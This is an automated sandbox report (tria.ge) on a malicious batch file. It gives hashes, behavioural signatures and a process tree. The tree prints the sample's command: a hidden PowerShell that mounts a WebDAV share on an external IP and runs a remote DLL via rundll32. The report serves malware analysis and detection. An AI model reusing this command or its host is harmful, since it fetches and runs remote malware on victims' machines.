Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
13/07/2024, 13:16
Static task
static1
Behavioral task
behavioral1
Sample
fe058b4127427e79d6eef9dcb97fd2d0aae0964e033bcfac43b67a51ddd4a0c9.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
fe058b4127427e79d6eef9dcb97fd2d0aae0964e033bcfac43b67a51ddd4a0c9.bat
Resource
win10v2004-20240709-en
General
-
Target
fe058b4127427e79d6eef9dcb97fd2d0aae0964e033bcfac43b67a51ddd4a0c9.bat
-
Size
2KB
-
MD5
ba1fee914528c6a5fe382d45b5ad9e84
-
SHA1
b27aa2ce3bf2dcea79ca1a01d55cf05d58c09068
-
SHA256
fe058b4127427e79d6eef9dcb97fd2d0aae0964e033bcfac43b67a51ddd4a0c9
-
SHA512
a133330ca04093b44ad2fba1efd61461f46c5d43e3f28f7edcc50cfc16175b44c923ddb3d342f7f6b1c301e81a8a893e5824d740d44c27dab6994f9dd2c6dc59
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2724 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2724 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2800 wordpad.exe 2800 wordpad.exe 2800 wordpad.exe 2800 wordpad.exe 2800 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2800 2128 cmd.exe 31 PID 2128 wrote to memory of 2800 2128 cmd.exe 31 PID 2128 wrote to memory of 2800 2128 cmd.exe 31 PID 2128 wrote to memory of 2724 2128 cmd.exe 32 PID 2128 wrote to memory of 2724 2128 cmd.exe 32 PID 2128 wrote to memory of 2724 2128 cmd.exe 32 PID 2724 wrote to memory of 2660 2724 powershell.exe 34 PID 2724 wrote to memory of 2660 2724 powershell.exe 34 PID 2724 wrote to memory of 2660 2724 powershell.exe 34 PID 2724 wrote to memory of 2556 2724 powershell.exe 35 PID 2724 wrote to memory of 2556 2724 powershell.exe 35 PID 2724 wrote to memory of 2556 2724 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\fe058b4127427e79d6eef9dcb97fd2d0aae0964e033bcfac43b67a51ddd4a0c9.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\2324.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2660
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\2324.dll entry3⤵PID:2556
-
-